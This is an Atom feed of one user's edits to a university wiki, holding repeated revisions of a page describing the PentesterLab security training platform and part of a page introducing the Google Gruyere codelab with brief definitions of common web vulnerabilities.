<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=BSener</id>
	<title>Elvis Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=BSener"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php/Special:Contributions/BSener"/>
	<updated>2026-09-10T13:04:01Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17672</id>
		<title>PentesterLab</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17672"/>
		<updated>2024-12-18T20:35:39Z</updated>

		<summary type="html">&lt;p&gt;BSener: /* References */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
PentesterLab was founded by Louis Nyffenegger, a security engineer who transformed his passion for cybersecurity into a comprehensive training platform.  Established in 2011, PentesterLab offers hands-on exercises and real-world scenarios to help users develop practical skills in web application security and penetration testing.  Nyffenegger&#039;s vision was to create an accessible and effective learning environment for both beginners and seasoned professionals, emphasizing manual exploitation techniques and the development of custom tools.  Under his leadership, PentesterLab has grown into a trusted resource for individuals and organizations seeking to enhance their cybersecurity expertise. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based. But you can install a VM locally (Linux Debian).&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
PentesterLab is an online learning platform dedicated to teaching practical cybersecurity and penetration testing skills through hands-on labs and real-world scenarios. The website offers a wide variety of resources, including guided exercises, comprehensive tutorials, and challenges that cover topics such as web application security, vulnerability identification, exploitation techniques, and post-exploitation practices. Users can explore different learning paths, tailored for both beginners and advanced professionals, focusing on specific areas like OWASP vulnerabilities, cryptography, or API security. Each lab comes with detailed explanations and code examples to help users understand and apply their knowledge effectively. Additionally, PentesterLab provides certificates for completed courses, making it a valuable tool for personal development and career advancement in cybersecurity.&lt;br /&gt;
== Playfull concept ==&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;b&amp;gt;Capture the Flag (CTF)&amp;lt;/b&amp;gt; principle in PentesterLab is centered around interactive, challenge-based learning designed to teach and test cybersecurity skills. In these CTF-style exercises, users are tasked with identifying vulnerabilities, exploiting them, and ultimately retrieving a specific &amp;quot;flag&amp;quot;—a piece of text or code that confirms successful completion of the task. &lt;br /&gt;
&lt;br /&gt;
PentesterLab’s CTF challenges range from beginner-friendly scenarios to highly advanced tasks, covering areas such as SQL injection, cross-site scripting (XSS), authentication bypasses, cryptographic flaws, and more. Each challenge simulates real-world penetration testing scenarios, allowing users to practice reconnaissance, attack planning, and exploitation techniques in a controlled environment. The flags act as milestones, motivating learners to think critically, debug issues, and refine their ethical hacking skills. Detailed explanations and walkthroughs accompany many challenges, making the CTF approach both educational and engaging.&lt;br /&gt;
&lt;br /&gt;
== Badges ==&lt;br /&gt;
&lt;br /&gt;
PentesterLab offers various certificates, known as badges, that showcase proficiency in specific areas of web application security and penetration testing. These badges include the &amp;lt;b&amp;gt;Introduction Badge&amp;lt;/b&amp;gt;, which teaches the basics of using PentesterLab; the &amp;lt;b&amp;gt;Essential Badge&amp;lt;/b&amp;gt;, covering common web vulnerabilities like SQL injection and XSS; the &amp;lt;b&amp;gt;PCAP Badge&amp;lt;/b&amp;gt;, focusing on network traffic analysis through packet captures; and the &amp;lt;b&amp;gt;Code Review Badge&amp;lt;/b&amp;gt;, designed to develop skills in identifying vulnerabilities through source code review. Each badge consists of practical exercises and instructional videos, with a certificate of completion awarded to users upon successful mastery of the material, making these badges valuable credentials for cybersecurity professionals at all levels.&lt;br /&gt;
&lt;br /&gt;
[[File:Badges.png|thumb|none|400px|PentesterLab Badges; source: https://miro.medium.com/]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.hackthebox.com/ HackTheBox]&lt;br /&gt;
* [https://tryhackme.com/ TryHackMe]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://pentesterlab.com/&lt;br /&gt;
* https://medium.com/techspace-usict/&lt;br /&gt;
* https://owasp.org/www-project-top-ten/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17671</id>
		<title>PentesterLab</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17671"/>
		<updated>2024-12-18T20:34:40Z</updated>

		<summary type="html">&lt;p&gt;BSener: /* Badges */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
PentesterLab was founded by Louis Nyffenegger, a security engineer who transformed his passion for cybersecurity into a comprehensive training platform.  Established in 2011, PentesterLab offers hands-on exercises and real-world scenarios to help users develop practical skills in web application security and penetration testing.  Nyffenegger&#039;s vision was to create an accessible and effective learning environment for both beginners and seasoned professionals, emphasizing manual exploitation techniques and the development of custom tools.  Under his leadership, PentesterLab has grown into a trusted resource for individuals and organizations seeking to enhance their cybersecurity expertise. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based. But you can install a VM locally (Linux Debian).&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
PentesterLab is an online learning platform dedicated to teaching practical cybersecurity and penetration testing skills through hands-on labs and real-world scenarios. The website offers a wide variety of resources, including guided exercises, comprehensive tutorials, and challenges that cover topics such as web application security, vulnerability identification, exploitation techniques, and post-exploitation practices. Users can explore different learning paths, tailored for both beginners and advanced professionals, focusing on specific areas like OWASP vulnerabilities, cryptography, or API security. Each lab comes with detailed explanations and code examples to help users understand and apply their knowledge effectively. Additionally, PentesterLab provides certificates for completed courses, making it a valuable tool for personal development and career advancement in cybersecurity.&lt;br /&gt;
== Playfull concept ==&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;b&amp;gt;Capture the Flag (CTF)&amp;lt;/b&amp;gt; principle in PentesterLab is centered around interactive, challenge-based learning designed to teach and test cybersecurity skills. In these CTF-style exercises, users are tasked with identifying vulnerabilities, exploiting them, and ultimately retrieving a specific &amp;quot;flag&amp;quot;—a piece of text or code that confirms successful completion of the task. &lt;br /&gt;
&lt;br /&gt;
PentesterLab’s CTF challenges range from beginner-friendly scenarios to highly advanced tasks, covering areas such as SQL injection, cross-site scripting (XSS), authentication bypasses, cryptographic flaws, and more. Each challenge simulates real-world penetration testing scenarios, allowing users to practice reconnaissance, attack planning, and exploitation techniques in a controlled environment. The flags act as milestones, motivating learners to think critically, debug issues, and refine their ethical hacking skills. Detailed explanations and walkthroughs accompany many challenges, making the CTF approach both educational and engaging.&lt;br /&gt;
&lt;br /&gt;
== Badges ==&lt;br /&gt;
&lt;br /&gt;
PentesterLab offers various certificates, known as badges, that showcase proficiency in specific areas of web application security and penetration testing. These badges include the &amp;lt;b&amp;gt;Introduction Badge&amp;lt;/b&amp;gt;, which teaches the basics of using PentesterLab; the &amp;lt;b&amp;gt;Essential Badge&amp;lt;/b&amp;gt;, covering common web vulnerabilities like SQL injection and XSS; the &amp;lt;b&amp;gt;PCAP Badge&amp;lt;/b&amp;gt;, focusing on network traffic analysis through packet captures; and the &amp;lt;b&amp;gt;Code Review Badge&amp;lt;/b&amp;gt;, designed to develop skills in identifying vulnerabilities through source code review. Each badge consists of practical exercises and instructional videos, with a certificate of completion awarded to users upon successful mastery of the material, making these badges valuable credentials for cybersecurity professionals at all levels.&lt;br /&gt;
&lt;br /&gt;
[[File:Badges.png|thumb|none|400px|PentesterLab Badges; source: https://miro.medium.com/]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.hackthebox.com/ HackTheBox]&lt;br /&gt;
* [https://tryhackme.com/ TryHackMe]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://pentesterlab.com/&lt;br /&gt;
* https://medium.com/techspace-usict/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:Badges.png&amp;diff=17670</id>
		<title>File:Badges.png</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:Badges.png&amp;diff=17670"/>
		<updated>2024-12-18T20:34:15Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17669</id>
		<title>PentesterLab</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17669"/>
		<updated>2024-12-18T20:33:43Z</updated>

		<summary type="html">&lt;p&gt;BSener: /* Requirements */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
PentesterLab was founded by Louis Nyffenegger, a security engineer who transformed his passion for cybersecurity into a comprehensive training platform.  Established in 2011, PentesterLab offers hands-on exercises and real-world scenarios to help users develop practical skills in web application security and penetration testing.  Nyffenegger&#039;s vision was to create an accessible and effective learning environment for both beginners and seasoned professionals, emphasizing manual exploitation techniques and the development of custom tools.  Under his leadership, PentesterLab has grown into a trusted resource for individuals and organizations seeking to enhance their cybersecurity expertise. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based. But you can install a VM locally (Linux Debian).&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
PentesterLab is an online learning platform dedicated to teaching practical cybersecurity and penetration testing skills through hands-on labs and real-world scenarios. The website offers a wide variety of resources, including guided exercises, comprehensive tutorials, and challenges that cover topics such as web application security, vulnerability identification, exploitation techniques, and post-exploitation practices. Users can explore different learning paths, tailored for both beginners and advanced professionals, focusing on specific areas like OWASP vulnerabilities, cryptography, or API security. Each lab comes with detailed explanations and code examples to help users understand and apply their knowledge effectively. Additionally, PentesterLab provides certificates for completed courses, making it a valuable tool for personal development and career advancement in cybersecurity.&lt;br /&gt;
== Playfull concept ==&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;b&amp;gt;Capture the Flag (CTF)&amp;lt;/b&amp;gt; principle in PentesterLab is centered around interactive, challenge-based learning designed to teach and test cybersecurity skills. In these CTF-style exercises, users are tasked with identifying vulnerabilities, exploiting them, and ultimately retrieving a specific &amp;quot;flag&amp;quot;—a piece of text or code that confirms successful completion of the task. &lt;br /&gt;
&lt;br /&gt;
PentesterLab’s CTF challenges range from beginner-friendly scenarios to highly advanced tasks, covering areas such as SQL injection, cross-site scripting (XSS), authentication bypasses, cryptographic flaws, and more. Each challenge simulates real-world penetration testing scenarios, allowing users to practice reconnaissance, attack planning, and exploitation techniques in a controlled environment. The flags act as milestones, motivating learners to think critically, debug issues, and refine their ethical hacking skills. Detailed explanations and walkthroughs accompany many challenges, making the CTF approach both educational and engaging.&lt;br /&gt;
&lt;br /&gt;
== Badges ==&lt;br /&gt;
&lt;br /&gt;
PentesterLab offers various certificates, known as badges, that showcase proficiency in specific areas of web application security and penetration testing. These badges include the &amp;lt;b&amp;gt;Introduction Badge&amp;lt;/b&amp;gt;, which teaches the basics of using PentesterLab; the &amp;lt;b&amp;gt;Essential Badge&amp;lt;/b&amp;gt;, covering common web vulnerabilities like SQL injection and XSS; the &amp;lt;b&amp;gt;PCAP Badge&amp;lt;/b&amp;gt;, focusing on network traffic analysis through packet captures; and the &amp;lt;b&amp;gt;Code Review Badge&amp;lt;/b&amp;gt;, designed to develop skills in identifying vulnerabilities through source code review. Each badge consists of practical exercises and instructional videos, with a certificate of completion awarded to users upon successful mastery of the material, making these badges valuable credentials for cybersecurity professionals at all levels.&lt;br /&gt;
&lt;br /&gt;
[[File:Badges.png|thumb|none|400px|PentesterLab Badges; source: https://miro.medium.com/v2/resize:fit:4800/format:webp/1*uXstZHOkERsqi4fw6BiMkg.png]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.hackthebox.com/ HackTheBox]&lt;br /&gt;
* [https://tryhackme.com/ TryHackMe]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://pentesterlab.com/&lt;br /&gt;
* https://medium.com/techspace-usict/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17668</id>
		<title>PentesterLab</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17668"/>
		<updated>2024-12-18T20:33:27Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
PentesterLab was founded by Louis Nyffenegger, a security engineer who transformed his passion for cybersecurity into a comprehensive training platform.  Established in 2011, PentesterLab offers hands-on exercises and real-world scenarios to help users develop practical skills in web application security and penetration testing.  Nyffenegger&#039;s vision was to create an accessible and effective learning environment for both beginners and seasoned professionals, emphasizing manual exploitation techniques and the development of custom tools.  Under his leadership, PentesterLab has grown into a trusted resource for individuals and organizations seeking to enhance their cybersecurity expertise. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based. But you can install a VM locally (Linux Debian).&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
PentesterLab is an online learning platform dedicated to teaching practical cybersecurity and penetration testing skills through hands-on labs and real-world scenarios. The website offers a wide variety of resources, including guided exercises, comprehensive tutorials, and challenges that cover topics such as web application security, vulnerability identification, exploitation techniques, and post-exploitation practices. Users can explore different learning paths, tailored for both beginners and advanced professionals, focusing on specific areas like OWASP vulnerabilities, cryptography, or API security. Each lab comes with detailed explanations and code examples to help users understand and apply their knowledge effectively. Additionally, PentesterLab provides certificates for completed courses, making it a valuable tool for personal development and career advancement in cybersecurity.&lt;br /&gt;
== Playfull concept ==&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;b&amp;gt;Capture the Flag (CTF)&amp;lt;/b&amp;gt; principle in PentesterLab is centered around interactive, challenge-based learning designed to teach and test cybersecurity skills. In these CTF-style exercises, users are tasked with identifying vulnerabilities, exploiting them, and ultimately retrieving a specific &amp;quot;flag&amp;quot;—a piece of text or code that confirms successful completion of the task. &lt;br /&gt;
&lt;br /&gt;
PentesterLab’s CTF challenges range from beginner-friendly scenarios to highly advanced tasks, covering areas such as SQL injection, cross-site scripting (XSS), authentication bypasses, cryptographic flaws, and more. Each challenge simulates real-world penetration testing scenarios, allowing users to practice reconnaissance, attack planning, and exploitation techniques in a controlled environment. The flags act as milestones, motivating learners to think critically, debug issues, and refine their ethical hacking skills. Detailed explanations and walkthroughs accompany many challenges, making the CTF approach both educational and engaging.&lt;br /&gt;
&lt;br /&gt;
== Badges ==&lt;br /&gt;
&lt;br /&gt;
PentesterLab offers various certificates, known as badges, that showcase proficiency in specific areas of web application security and penetration testing. These badges include the &amp;lt;b&amp;gt;Introduction Badge&amp;lt;/b&amp;gt;, which teaches the basics of using PentesterLab; the &amp;lt;b&amp;gt;Essential Badge&amp;lt;/b&amp;gt;, covering common web vulnerabilities like SQL injection and XSS; the &amp;lt;b&amp;gt;PCAP Badge&amp;lt;/b&amp;gt;, focusing on network traffic analysis through packet captures; and the &amp;lt;b&amp;gt;Code Review Badge&amp;lt;/b&amp;gt;, designed to develop skills in identifying vulnerabilities through source code review. Each badge consists of practical exercises and instructional videos, with a certificate of completion awarded to users upon successful mastery of the material, making these badges valuable credentials for cybersecurity professionals at all levels.&lt;br /&gt;
&lt;br /&gt;
[[File:Badges.png|thumb|none|400px|PentesterLab Badges; source: https://miro.medium.com/v2/resize:fit:4800/format:webp/1*uXstZHOkERsqi4fw6BiMkg.png]]&lt;br /&gt;
&lt;br /&gt;
== Similar Codelabs ==&lt;br /&gt;
&lt;br /&gt;
* [https://www.hackthebox.com/ HackTheBox]&lt;br /&gt;
* [https://tryhackme.com/ TryHackMe]&lt;br /&gt;
* [https://wiki.elvis.science/index.php?title=BWAPP bWAPP (Buggy Web Application)]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://pentesterlab.com/&lt;br /&gt;
* https://medium.com/techspace-usict/&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17664</id>
		<title>PentesterLab</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17664"/>
		<updated>2024-12-18T20:27:33Z</updated>

		<summary type="html">&lt;p&gt;BSener: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
PentesterLab was founded by Louis Nyffenegger, a security engineer who transformed his passion for cybersecurity into a comprehensive training platform.  Established in 2011, PentesterLab offers hands-on exercises and real-world scenarios to help users develop practical skills in web application security and penetration testing.  Nyffenegger&#039;s vision was to create an accessible and effective learning environment for both beginners and seasoned professionals, emphasizing manual exploitation techniques and the development of custom tools.  Under his leadership, PentesterLab has grown into a trusted resource for individuals and organizations seeking to enhance their cybersecurity expertise. &lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based. But you can install a VM locally (Linux Debian).&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
PentesterLab is an online learning platform dedicated to teaching practical cybersecurity and penetration testing skills through hands-on labs and real-world scenarios. The website offers a wide variety of resources, including guided exercises, comprehensive tutorials, and challenges that cover topics such as web application security, vulnerability identification, exploitation techniques, and post-exploitation practices. Users can explore different learning paths, tailored for both beginners and advanced professionals, focusing on specific areas like OWASP vulnerabilities, cryptography, or API security. Each lab comes with detailed explanations and code examples to help users understand and apply their knowledge effectively. Additionally, PentesterLab provides certificates for completed courses, making it a valuable tool for personal development and career advancement in cybersecurity.&lt;br /&gt;
=== Playfull concept ===&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;b&amp;gt;Capture the Flag (CTF)&amp;lt;/b&amp;gt; principle in PentesterLab is centered around interactive, challenge-based learning designed to teach and test cybersecurity skills. In these CTF-style exercises, users are tasked with identifying vulnerabilities, exploiting them, and ultimately retrieving a specific &amp;quot;flag&amp;quot;—a piece of text or code that confirms successful completion of the task. &lt;br /&gt;
&lt;br /&gt;
PentesterLab’s CTF challenges range from beginner-friendly scenarios to highly advanced tasks, covering areas such as SQL injection, cross-site scripting (XSS), authentication bypasses, cryptographic flaws, and more. Each challenge simulates real-world penetration testing scenarios, allowing users to practice reconnaissance, attack planning, and exploitation techniques in a controlled environment. The flags act as milestones, motivating learners to think critically, debug issues, and refine their ethical hacking skills. Detailed explanations and walkthroughs accompany many challenges, making the CTF approach both educational and engaging.&lt;br /&gt;
&lt;br /&gt;
=== Badges ===&lt;br /&gt;
&lt;br /&gt;
PentesterLab offers various certificates, known as badges, that showcase proficiency in specific areas of web application security and penetration testing. These badges include the &amp;lt;b&amp;gt;Introduction Badge&amp;lt;/b&amp;gt;, which teaches the basics of using PentesterLab; the &amp;lt;b&amp;gt;Essential Badge&amp;lt;/b&amp;gt;, covering common web vulnerabilities like SQL injection and XSS; the &amp;lt;b&amp;gt;PCAP Badge&amp;lt;/b&amp;gt;, focusing on network traffic analysis through packet captures; and the &amp;lt;b&amp;gt;Code Review Badge&amp;lt;/b&amp;gt;, designed to develop skills in identifying vulnerabilities through source code review. Each badge consists of practical exercises and instructional videos, with a certificate of completion awarded to users upon successful mastery of the material, making these badges valuable credentials for cybersecurity professionals at all levels.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17659</id>
		<title>PentesterLab</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PentesterLab&amp;diff=17659"/>
		<updated>2024-12-18T20:13:59Z</updated>

		<summary type="html">&lt;p&gt;BSener: Created&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Description what this documentation is about.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
* Packages: git emacs&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>BSener</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17658</id>
		<title>Google Gruyere</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Google_Gruyere&amp;diff=17658"/>
		<updated>2024-12-18T20:12:31Z</updated>

		<summary type="html">&lt;p&gt;BSener: Attack example for password stealing added&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Google Gruyere is an educational codelab developed by Bruce Leban, Mugdha Bendre, and Parisa Tabriz to demonstrate common security vulnerabilities in web applications and provide solutions to these problems. It serves as a practical platform for learning how to identify and avoid security risks.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div&amp;gt;&amp;lt;ul&amp;gt; &lt;br /&gt;
&amp;lt;li style=&amp;quot;display: inline-block;&amp;quot;&amp;gt; [[File:Gruyere 1.png|thumb|none|400px|Google Gruyere; source: https://google-gruyere.appspot.com]] &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Not specific, as it is web-based&lt;br /&gt;
* Additional software: An up-to-date web browser&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
The Codelab is organized by types of vulnerabilities. In each section you will find a short description of a vulnerability and a task to find an example of this vulnerability in Gruyere. Our task now is to slip into the role of a malicious hacker and find and exploit the vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
If needed, there are further hints. There are also solutions on how to eliminate these security gaps.&lt;br /&gt;
&lt;br /&gt;
In the Codelab, we will use both black-box hacking and white-box hacking. Black-box hacking involves trying to find vulnerabilities by experimenting with the application and manipulating input fields and URL parameters, trying to cause application errors, and looking at the HTTP requests and responses to guess the server behavior. You do not have access to the source code.&lt;br /&gt;
&lt;br /&gt;
With white-box hacking, you have access to the source code and can perform automated or manual analysis to find errors. You can therefore treat Gruyere as if it were open source: read through the source code and try to find errors. Gruyere is written in Python, so a certain familiarity with Python can be helpful. However, the vulnerabilities covered are not Python-specific, and you can do most of the exercise without having to look at the code.&lt;br /&gt;
&lt;br /&gt;
== Access ==&lt;br /&gt;
&lt;br /&gt;
To access Google Gruyere follow the following Steps:&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Visit the [https://google-gruyere.appspot.com Google Gruyere website] and follow the instructions to start the exercises.&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
After that, click &amp;quot;Continue&amp;quot;. This will lead you to [https://google-gruyere.appspot.com/part1 Part1] of the Website, where you lern how to access Gruyere, view the code and you will be given a few tasks to familiarize yourself with Gruyere. If you proceed to click &amp;quot;Continue&amp;quot; you will get to Part 2 - 5 of the Gruyere Website, where the challenges will be listed.&lt;br /&gt;
&lt;br /&gt;
=== Step 3 ===&lt;br /&gt;
&lt;br /&gt;
Now you can open the [https://google-gruyere.appspot.com/start Start link] to access the codelab.&lt;br /&gt;
&lt;br /&gt;
== Concepts used ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Scripting (XSS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which malicious code is injected into a trusted website. The code is then executed by unsuspecting users, which can lead to data leaks or other security problems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Client-State Manipulation&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attacker manipulates the state of the client application (such as a web browser), often to circumvent security mechanisms or to fake false information.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross-Site Request Forgery (XSRF)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack in which the attacker performs an action on behalf of an authenticated user, often without the user&#039;s knowledge or consent.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Cross Site Script Inclusion (XSSI)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A variant of XSS in which malicious scripts from an external source are integrated into a website.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Path Traversal&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; An attack that is exploited to access files and directories located outside the intended web directory, often to obtain or manipulate sensitive data.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Denial of Service (DoS)&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Attacks aimed at making a service, such as a website, inaccessible, often by overloading the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Code Execution&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; A vulnerability that allows an attacker to execute arbitrary code on a target device or server, which can lead to a complete takeover.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;b&amp;gt;Configuration Vulnerabilities&amp;lt;/b&amp;gt;&lt;br /&gt;
  &amp;amp;#10149; Security vulnerabilities that arise due to misconfigurations in software or systems.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
